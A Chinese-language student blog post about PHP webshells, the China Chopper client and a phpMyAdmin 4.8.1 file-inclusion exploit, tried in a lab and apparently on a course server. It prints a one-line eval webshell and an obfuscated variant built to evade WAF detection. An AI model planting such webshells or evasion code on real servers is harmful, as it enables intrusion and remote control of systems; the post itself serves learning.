web滲透-php文件上傳/包含漏洞測試記錄

幾個月之前就開始寫了,這個時間才發出來,主要原因是博客最後部分的實戰是想覆盤一遍,把過程記錄進去,但是又懶得覆盤,所以一直放着就忘記了。最後的結果就是不做覆盤了,網上的資料很多。

前言

不知不覺中這一學期已然結束,也有一段時間沒有寫博客了,主要是臨近期末,準備各門課的課設和考試,沒有什麼時間來寫博客。這篇博客便對期末時自己的一些不務正業做個記錄。
所謂不務正業,就是在準備php課設時對web滲透產生了一些興趣,並且做了一些嘗試。在這篇博客中做一個總結分享記錄。

WebShell

首先解釋一下什麼是WebShell,WebShell就是以asp、php、jsp或者cgi等網頁文件形式存在的一種命令執行環境,也可以將其稱之爲一種網頁後門。黑客通過各種手段將木馬腳本文件保存在靶機服務器目錄下,與正常文件混淆在一起,通過Get/Post方式提交代碼至木馬文件,木馬文件腳本就會運行你的代碼,從而達到各種目的。

一句話木馬

舉一個最簡單的木馬例子,php的一句話木馬腳本:

<?php @eval($_POST["pass"]);?>

eval即是將參數字符串內容當作代碼來執行,"pass"即是post方式提交的參數的key值。
但是這種一句話木馬極大可能會被WAF防火牆給幹掉,需要變一變,也就是做免殺處理:

<?php
	$str = "abcdefs";
	$s = substr($str,-1,1);
	$ev = 'a' . $s . 'sert';
	$ev($_POST['pass']);
?>

菜刀

有了一句話木馬,並通過手段放入靶機服務器目錄後,即可傳入代碼達到目的,如果通過手工方式書寫各種功能腳本代碼較爲麻煩,這裏就要介紹一個好用的工具了,那就是大菜刀了——中國菜刀,所謂武功再高也怕菜刀。去 過狗菜刀 官網賣菜刀的地,買一把耍一耍。
菜刀的主界面
在這裏插入圖片描述
在這裏插入圖片描述
以上就是菜刀的簡單應用,只需要添加你的木馬腳本地址即可,上圖中ip地址爲本人自己內網搭建的靶機環境。通過操作菜刀即可實現webshell的常見功能,當然也可以自寫腳本,但是要做一些過WAF的處理,就像上面的免殺一句話木馬一樣。

文件上傳/包含漏洞

文件包含或者文件上傳漏洞原理都類似,只是實現的手段不同。其原理都是讓靶機服務器執行你需要的的腳本文件,達到你需要的目的。
不知不覺中已經快大四了,以前也是經常聽聞各種學長入侵學校圖書館管理系統或是教務系統修改個人成績的渾事,有時也是一笑,不過好像作爲計算機的學生在大學不做點這種渾事貌似都有點遺憾,畢竟學校還是比較包容的,進入社會再做這些渾事就不能善了了。這學期的php課程算是彌補了我的這個遺憾,不過也並不算是入侵,畢竟也算是作業的一部分。

文件上傳利用

這個漏洞利用在我的個人實踐中做的十分簡單,
下面要介紹的是一個phpMyAdmin4.8.1的一個文件包含漏洞的利用過程。
具體就不多做覆盤了,原理就是利用phpMyAdmin4.8.1連接過濾規則的漏洞,注入目標文件的地址,做到包含惡意文件達到目的。惡意文件則是通過建表生成,將表字段名,寫成一句話木馬即可做到。由於目標主機使用wamp部署,所以目錄結構非常明確。所以這個漏洞利用必須建立在有庫密碼的情況下。漏洞細節我貼個參考地址<<,懶得自己覆盤了。我就說一句,php課程報告服務器的phpMyAdmin的版本就是4.8.1。
.

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章